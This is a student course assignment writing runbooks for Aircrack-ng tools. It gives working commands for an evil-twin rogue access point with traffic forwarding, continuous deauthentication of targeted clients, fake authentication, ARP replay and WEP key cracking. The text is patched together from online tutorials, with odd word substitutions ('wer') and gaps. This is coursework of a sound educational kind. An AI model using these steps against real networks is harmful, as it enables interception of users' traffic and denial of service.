COURSE: 2021S-T1 ISN 1903 - Wireless and Mobile Device

Security 02 (CSFM Group 2)

Assignment Aircarck-ng Suite (Assignment 2)

Submitted By:
David Olaitan Aridiogo
Student ID: 774493
1.Choose three modules from the Aircrack-ng suite.
Answer: The three choice of module from Aircrack suite-ng suite are:
 Airbase-ng
 Airgraph-ng
 Aireplay-ng

2.Write a runbook on how to do the following for each of the tools

     a) What the tool does?
     b )Strengths of using the tool?
     c) Installation steps…
     d) Configuration step…
Answer

Runbook for Airbase-ng

a) Function: Airbase-ng is multi-purpose tool aimed at attacking clients as
opposed to the Access Point (AP) itself. Its features are as follows;
 It can implements the Caffe Latte WEP client attack
 It can also implements the Hirte WEP client attack
 It has ability to cause the WPA/WPA2 handshake to be captured.
 It has ability to act as an ad-hoc Access Point.
 It can act as a full Access Point.
 It can filter by SSID or client MAC addresses.
 It can manipulate and resend packet
 It can encrypt sent packets and decrypt received packets.

b) Strength of Using Airbase-ng

 Using Airbase, one can pretend to be a legitimate access point and
perform man-in-the-middle attacks on devices that connect to wer system.
This attack is also called the “Evil Twin Attack”. Assuming someone is
in Starbucks trying to connect to their Wifi, an attacker can create another
access point with the same name (usually with better signal strength)
making we think that the access point belongs to Starbucks thus making it
hard for regular users to differentiate between a legitimate access point
and a rogue access point.

c)
d) Configuration steps for Airbase-ng
Step 1: Sniff the Air
 First victims AP information must be observed
 set wifi-adpater in monitor mode
there are two options to do so, I prefer this commands
"ifconfig wlan0 down"
"iwconfig wlan0 mode monitor"
"ifconfig wlan0 up"

Step 2: Set Up DHCP-Server

 To provide our fake-AP with internet connection we have to set up
an DHCP-server to configure the fake-AP with an IP-address and
subnet.
 prove if isc-dhcp-server is already installed
open a new Terminal
"dpkg -s isc-dhcp-server | grep Status"
if not
"apt-get install isc-dhcp-server"
Step 3: Create the Eviltwin
no type in the second terminal
"airbase-ng -e wireless -c 2 wlan0"
here we have created the eviltwin-AP.
to change even the BSSID and not just the ESSID type
"airbase-ng -e wireless -a 64:7C:34:92:2B:41 -c 2 wlan0"
but for this attack is it not really necessary and just confuse while
monitoring the results.

Image via imgur.com
so here we started the eviltwin-AP and it has the
BSSID C4:E9:84:0D:9C:FA
to monitor the connections we open a third terminal and type
"airodump-ng --bssid C4:E9:84:0D:9C:FA -c 2 wlan0"
Term1: monitors the real-AP
Term2: runs the fake-AP
Term3: monitors the fake-AP

Step 4: Provide Internet to the Eviltwin

airbase provide us with a new network-interface while it is running.
"ifconfig at0"
should show some results now
so we bring it up
"ifconfig at0 up"
"ifconfig at0 192.168.2.1 netmask 255.255.255.0"
now start the dhcp-server
here the server will be started with the edited dhcpd.conf
"dhcpd -cf /etc/dhcp/dhcpd.conf "
to be sure the file is load correctly
"service isc-dhcp-server restart"

Image via imgur.com
wrong ip-address in this picture, should be 192.168.2.1

Step 5: Configuring the Firewall

type this commands
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface eth0 -j
MASQUERADE
iptables --append FORWARD -j ACCEPT --in-interface at0
echo 1 > /proc/sys/net/ipv4/ipforward
They will configure the firewall to route all traffic from at0 to eth0.
The last command say to the network card: "act like a router and forward
all traffic to his destination"

Step 6: Shoot Down the Connection

open a fourth terminal and send deauthenticate frames to the device
which sticks on the real-AP.
"aireplay-ng --deauth 0 -a 64:7C:34:92:2B:41 -c F8:01:13:4A:BA:D7
wlan0"
--deauth 0 means that the frames will sending in an endless loop
(or till we have the connection we want to)
-a defines the BSSID of the AP
-c defines the MAC of the device we want to observe
we just shot down a specific device to avoid to much attention on
network-flutter the result

Image via imgur.com
Image via imgur.com
 Run book for Airgraph-ng
a) Function of Airgraph-ng; Airgraph-ng is tool to generate graphs to
visualize data captured by airodump-ng. It can create two types of
graphs:
 CAPR: Client – Access Point Relationship, showing all the
clients connected to the different access points
 CPG: Common Probe Graph, shows a graph centered on probed
ESSID and devices MAC who probed them
b) Strength of Using Airgraph-ng
We can't read the traffic flowing between devices, but we can watch
the relationship between Wi-Fi devices like laptops, smartphones, and
IoT products to learn about the network and the people behind them.
To understand how a network is connected, we can sniff the Wi-Fi
radio traffic in the area to discover which devices are currently
connected to an access point, building a list of relationships through
Airgraph-ng.
Airgraph-ng is pretty straightforward, as can be seen by its manual
page entry.

NAME
airgraph-ng - a 802.11 visualization utility

SYNOPSIS
airgraph-ng [options]

DESCRIPITION
airgraph-ng graphs the CSV file generated by Airodump-ng. The idea
is that we are showing the
relationships of the clients to the AP's so don't be shocked if we
see only one mapping as
we may only have captured one client
OPTIONS
-h Shows the help screen.

-i Airodump-ng CSV file

-o Output png file.

-g Choose the Graph Type. Current types are [CAPR (Client to AP

Relationship) & CPG (Com‐
mon probe graph)].

-a Print the about.

EXAMPLES
airgraph-ng -i dump-01.csv -o dump.png -g CAPR

airgraph-ng -i dump-01.csv -o dump.png -g CPG

c) Installation steps for Airgraph-ng

Quick Install Instructions of airgraph-ng on Ubuntu Server.
Step 1: Type or copy “sudo apt-get update -y”
Step 2 Type or copy “sudo apt-get install -y airgraph-ng”
Step 3: Check the system logs to confirm that there are no related
errors. ZoomAdmin can be use to check the logs, manager servers,
host multiple websites and apps on the servers and more. The apps run
in docker containers.
Execute the commands above step by step.
Note: -y flag means to assume yes and silently install, without asking
questions in most cases.
 d) Configuration steps
Step 1: Update our System & Install if Needed
If running Kali Linux, everything needed ought to be installed.
First, we'll need to update and ensure we have the Aircrack-ng suite.
To do so, connect wer Kali computer to the internet and run the
following commands in a terminal window.
apt update
apt upgrade
apt install aircrack-ng
Run the following commands to see the help output for each program.
airodump-ng --help
Airodump-ng 1.5.2 - (C) 2006-2018 Thomas d'Otreppe
https://www.aircrack-ng.org

usage: airodump-ng <options> <interface>[,<interface>,...]

Options:
--ivs : Save only captured IVs
--gpsd : Use GPSd
--write <prefix> : Dump file prefix
-w : same as --write
--beacons : Record all beacons in dump file
--update <secs> : Display update delay in seconds
--showack : Prints ack/cts/rts statistics
-h : Hides known stations for --showack
-f <msecs> : Time in ms between hopping channels
--berlin <secs> : Time before removing the AP/client
from the screen when no more packets
are received (Default: 120 seconds)
-r <file> : Read packets from that file
-x <msecs> : Active Scanning Simulation
--manufacturer : Display manufacturer from IEEE OUI list
--uptime : Display AP Uptime from Beacon Timestamp
--wps : Display WPS information (if any)
--output-format
<formats> : Output format. Possible values:
pcap, ivs, csv, gps, kismet, netxml, logcsv
--ignore-negative-one : Removes the message that says
fixed channel <interface>: -1
--write-interval
 <seconds> : Output file(s) write interval in seconds
--background <enable> : Override background detection.

Filter options:
--encrypt <suite> : Filter APs by cipher suite
--netmask <netmask> : Filter APs by mask
--bssid <bssid> : Filter APs by BSSID
--essid <essid> : Filter APs by ESSID
--essid-regex <regex> : Filter APs by ESSID using a regular
expression
-a : Filter unassociated clients

By default, airodump-ng hops on 2.4GHz channels.

We can make it capture on other/specific channel(s) by using:
--ht20 : Set channel to HT20 (802.11n)
--ht40- : Set channel to HT40- (802.11n)
--ht40+ : Set channel to HT40+ (802.11n)
--channel <channels> : Capture on specific channels
--band <abg> : Band on which airodump-ng should hop
-C <frequencies> : Uses these frequencies in MHz to hop
--cswitch <method> : Set channel switching method
0 : FIFO (default)
1 : Round Robin
2 : Hop on last
-s : same as --cswitch

--help : Displays this usage screen

airgraph-ng --help
Usage: airgraph-ng options [-o -i -g ]

Options:
-h, --help show this help message and exit
-o OUTPUT, --output=OUTPUT
Our Output Image ie... Image.png
-i INPUT, --dump=INPUT
Airodump txt file in CSV format. NOT the pcap
-g GRAPH_TYPE, --graph=GRAPH_TYPE
Graph Type Current [CAPR (Client to AP Relationship)
OR CPG (Common probe graph)]
If we see the help output for both Airodump-ng and Airgraph-ng, then we're ready
to start intercepting and interpreting packets!

Step 2: Plug in the Card & Enable Monitor Mode:

Plug in the wireless network adapter we intend to use to sniff Wi-Fi packets. This
should be a wireless network adapter that is compatible with Kali Linux. The Alfa
AWUS036NHA is a solid one to use, but there are plenty more that may fit wer
needs better.
Once we've plugged in the adapter, we can put it into monitor mode by using another
program installed with Aircrack-ng. We'll use Airmon-ng to put our card into
monitor mode, after running ifconfig to get the name of our network adapter. In our
example, our adapter is named "wlan2."
airmon-ng start wlan2
Found 3 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

PID Name
561 NetworkManager
627 wpa_supplicant
3561 dhclient

PHY Interface Driver Chipset

phy0 wlan0 ath9k Qualcomm Atheros QCA9565 / AR9565 Wireless Network

Adapter (rev 01)
phy5 wlan2 rt2800usb Ralink Technology, Corp. RT2870/RT3070

(mac80211 monitor mode vif enabled for [phy5]wlan2 on [phy5]wlan2mon)

(mac80211 station mode vif disabled for [phy5]wlan2)
Now, run ifconfig again. We should see that wer card has mon added to the end.
This means that wer card is now in wireless monitor mode, and we're ready to
proceed to the next step.

Step3: Run Airodump-Ng & Save CSV File

Now that our wireless card can listen in on any Wi-Fi packet in the area, we need to
start recording this information to a file. We'll use Airodump-ng to do this,
effectively dumping all packets received on our network adapter to a file for us to n
interpret later.
Remembering the name of our wireless network adapter which is now in monitor
mode, run the following command to save all packets intercepted by the interface
"wlan2mon" (or whatever wers is called) to a file named capturefile.
airodump-ng wlan2mon -w capturefilename
CH 10 ][ Elapsed: 4 mins ][ 2019-02-03 21:32

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

14:CC:20:6D:22:BA -26 69 0 0 8 130 WPA2 CCMP PSK

CafeMak4_2.4G
 AA:6B:AD:6F:AC:55 -31 136 0 0 6 65 WPA2 CCMP PSK DIRECT-
HQHL-L9310CDW_BRac55
EC:1D:7F:F9:10:03 -33 159 0 0 6 65 WPA2 CCMP PSK
cafemak_pwm
2C:FD:A1:E4:9D:50 -40 109 152 0 9 260 WPA2 CCMP PSK
CafeMak1_2.4G
84:1B:5E:E9:8A:1A -52 136 3668 0 11 54e WPA2 CCMP PSK
CafeMak6_2.4G
16:18:D6:04:F1:1E -58 54 2 0 1 195 WPA2 CCMP PSK
770staff1
26:18:D6:04:F1:1E -59 74 0 0 1 195 WPA2 CCMP PSK 770guest
F8:18:97:65:BC:F3 -59 50 0 0 1 130 WPA2 CCMP PSK
ATT717_guest
06:18:D6:04:F1:1E -60 52 0 0 1 195 WPA2 CCMP PSK exec
04:18:D6:04:F1:1E -60 87 0 0 1 195 WPA2 CCMP PSK 770org
3C:36:E4:F7:6D:20 -61 84 0 0 6 130 WPA2 CCMP PSK ATT120
36:18:D6:04:EF:0F -62 71 0 0 6 195 WPA2 CCMP PSK <length:
0>
06:18:D6:04:EF:0F -62 66 0 0 6 195 WPA2 CCMP PSK exec
36:18:D6:04:F1:1E -62 64 0 0 1 195 WPA2 CCMP PSK <length:
0>
04:18:D6:04:EF:0F -63 123 0 0 6 195 WPA2 CCMP PSK 770org
F8:18:97:65:BC:F2 -64 46 5 0 1 130 WPA2 CCMP PSK ATT717
04:18:D6:04:2E:FA -64 44 0 0 1 195 WPA2 CCMP PSK rb
26:18:D6:04:EF:0F -64 97 0 0 6 195 WPA2 CCMP PSK 770guest
16:18:D6:04:EF:0F -64 78 0 0 6 195 WPA2 CCMP PSK
770staff1
A0:8C:FD:B7:9D:A9 -65 68 0 0 6 65 WPA2 CCMP PSK DIRECT-
A8-HP OfficeJet 4650
E8:8D:28:60:BE:77 -68 63 3 0 6 195 WPA2 CCMP PSK Joel's
Wi-Fi Network
When we're done collecting packets, we can type Ctrl-c to stop the capture. This will
generate a CSV file containing all the information we need.

Step 4: Generate a Graph of AP Relationships (Connected Devices)

Now, it's time to generate our first graph from the wireless data we've intercepted.
We can think of this data like metadata, telling us which devices were calling each
other, but not what they were saying.First, we'll start a graph of the client AP
relationships. After locating the CSV file we created, run the following command in
a terminal window to create a CAPR graph of which device is connected to which
access point. Replace "CAPRintercept.png" with the name of the graph we want to
create, and '/root/Desktop/cafemak-01.csv' with the path to the CSV file.
airgraph-ng -o CAPRintercept.png -i '/root/Desktop/cafemak-01.csv' -g CAPR
**** WARNING Images can be large, up to 12 Feet by 12 Feet****
Creating wer Graph using, /root/Desktop/cafemak-01.csv and writing to, cafemak.png
Depending on wer system this can take a bit. Please standby......
.

 RunBook for Aireplay-ng

a) Function of Aireplay-ng: Aireplay-ng is used to generate rogue Wireless

traffic. It can be used along with aircrack-ng to crack WEP and WPA keys.
The main purpose of aireplay-ng is to inject frames. There are several
different types of powerful attacks that can be performed using aireplay-ng,
such as the deauthentication attack, which helps in capturing WPA
handshake data, or the fake authentication attack, in which packets are
injected into the network access point by authenticating to it to create and
capture new IVs.
b) Strength of using Aireplay-ng
Certain network cards do not support packet injection, and aireplay-ng only
works with network cards that support this feature. The first thing to do
before performing an attack is to check whether wer network card supports
injection. someone can do this simply by running an injection test using the
following command: “ubuntu@ubuntu:~$ sudo aireplay-ng -9 wlan0”. More
so, Aireplay-ng is a useful tool that helps in cracking WPA/WPA2-PSK and
WEP keys by performing various powerful attacks on wireless networks. In
this way, aireplay-ng generates important traffic data to be used later on.
Aireplay-ng also comes with aircrack-ng, a very powerful software suite
consisting of a detector, a sniffer, and WPA and WEP/WPS cracking and
analysis tools.

c) Installation steps for Aireplay-ng

First of all, we would have this thing:-
1. Ubuntu Intrepid
2. AR5007EG (AR242X atheros chipset)
3. ath5k wireless driver and working
4. Pre-installed aircrack-ng 1:1.0~rc1-2ubuntu1 (sudo apt-get install aircrack-ng)
Equipment Used
 MAC address of my laptop 00:19:7E:2F:3E:4C (run ifconfig in terminal)
 BSSID (MAC address of access point/AP) 00:17:3F:06:A3:00
 ESSID (wireless network name) belkin54g
 AP channel = Access point channel (11)
 Wireless interface (mon0)
Step 1 – Start wireless interface in monitor mode according to AP channel
Go to terminal and type this code.
$ sudo airmon-ng start wlan0 11
Step 2 – Use airodump to capture packet
Run this code in terminal again.
sudo airodump-ng -c 11 --bssid 00:17:3F:06:A3:00 -w x mon0
Where:-
 -c = is channel of the AP
 –bssid = MAC address of the AP
 -w = is the instruction to save the file
 x = is the file name
 mon0 = wireless interface (monitor mode)
Step 3 – Do aireplay to deauthenticate/associate with AP
Open a new terminal and type this code,
sudo aireplay-ng -1 6000 -o 1 -q 10 -e belkin54g -a 00:17:3F:06:A3:00 -h 00:19:7E:2F:3E:4C
mon0
Where:-
 -1 = fake authentication
 6000 = re-authenticate every 6000 seconds
 -o 1 = send only 1 set of packet at a time
 -q 10 = send keep alive packet every 10 seconds
 -e = wireless network name
 -a = AP MAC address
 -h = my wireless card MAC address
If u have some problem then  TRY TO DO TROUBLE SHOOTING AND READ THE
AIRCRACK-NG TUTORIALS here, AS THAT IS BEYOND MY EXPERIENCE.
Failing this step is the biggest reason why injection fails. Some AP, may enable MAC
filtering, if this happen we should using a MAC from an already-associated client.
Step 4 – Start aireplay in ARP request replay mode
This step will listen to ARP request then re-inject them back into the network. The reason is,
the AP will normally re-broadcast them and generate a new IV. The objective = to obtain a
large number of IVs in a short period of time.
Open a new terminal and type this code in terminal
sudo aireplay-ng -3 -b 00:17:3F:06:A3:00 -h 00:19:7E:2F:3E:4C mon0
Step 5 – Cracking for password
Then start a new terminal again and run this code
sudo aircrack-ng -z *.cap
Where:-
 -z = invokes the PTW WEP cracking method
 *.cap = all file save and captured by airodump-ng (normally in wer home
directory)
d) Configuration steps for Aireplay-ng
Step 1: Update Kali
With those two requirements taken care of, we can get started by making sure our
system is fully up to date. In Kali, the command to do can be seen below.
apt update
After this, we can be ready to go, but make sure that we have a target with
permission to access (and deny service to) with the Aireplay-ng tool. While we can
scan any network we cant with Kismet, Aireplay-ng will execute a denial-of-service
attack that is illegal to run against a network we don't have permission to audit.
Step 2: Choosing the Weapon
The first step in identifying wireless targets is to conduct passive recon on the wireless
environment. To do this, we can use a program called Kismet which can perform wireless
signals intelligence in a passive and undetectable fashion. The advantage of this is that by
simply being in proximity to your target, you can observe the wireless traffic in the area
and later parse the information to find interesting devices.
An alternative to Kismet is running Arp-scan, which can be configured in a number of
ways to filter information further about the networks you discover. While this does work,
sometimes the output takes more work to decipher. We'll be using Kismet, however, for
the rest of this guide.

Step 3: Put the Wireless Adapter in Monitor Mode

To start scanning with either tool, we'll need to put our wireless network adapter into
monitor mode. We can do so by typing the following, assuming wlan0 is the name of your
wireless
card. You can get the name of your wireless card by running ifconfig or ip a to list the
available network interfaces.
Step 4: Start Up Kismet on the Network
Once monitor mode is taken care of, we can start Kismet by typing the following.
kismet -c wlan0mon
In this; command, we are specifying which network adapter to use with Kismet with the -
c (client) flag. We should see something like the output below. we can press Tab,
then Return, to close the console window and show the main screen.
Step 5: Discover Wireless Security Cameras with Kismet
We can now scroll through the network and attempt to identify interesting devices. If you
can't do this, you may need to enable more options under the "Preferences" menu to see
the source of packets.

Step 6: Execute the Deauthentication Attack

To begin disrupting the connection to the device we've targeted, we'll need to lock our
wireless network to the channel we observed traffic on. We can do this by typing the
following commands, assuming we want to lock the network adapter to channel 6.
airmon-ng start wlan0mon 6

Now that our card is on the correct channel, we can direct the command which will
disconnect the device we've located. The command we will use to do this is formatted like
this:
“aireplay-ng -0 0 -a <bssid of access point> -c <bssid of client device> <name of the
adapter>”
To break down what the commands above are doing:
 -0 will set the attack option to option 0, a deauthentication attack which will send
authentication packets pretending to be from the access point to the device.
The 0 that follows indicates to send a continuous stream of deauthentication
packets, but you can also choose a fixed number to send here.
 -a will set the BSSID of the Wi-Fi access point that the device is connected to.
 -c will set the BSSID of the device we wish to kick off the network.
Our final command for our example would be as follows.
“aireplay-ng -0 0 -a f2:9f:c2:34:55:64 -c a4:14:37:44:1f:ac wlan0mon”
Once this command executes, it will continue to jam the Wi-Fi connection between the
two devices until you cancel the command by hitting the Ctrl-C key combination.

REFERENCE
https://en.kali.tools/?p=598
https://www.aircrack-ng.org/doku.php?id=airgraph-ng
https://linuxhint.com/aireplay_ng/
https://www.freecodecamp.org/news/wifi-hacking-securing-wifi-networks-with-aircrack-
ng/
https://mdickinson.dyndns.org/php/wordpress/?p=1075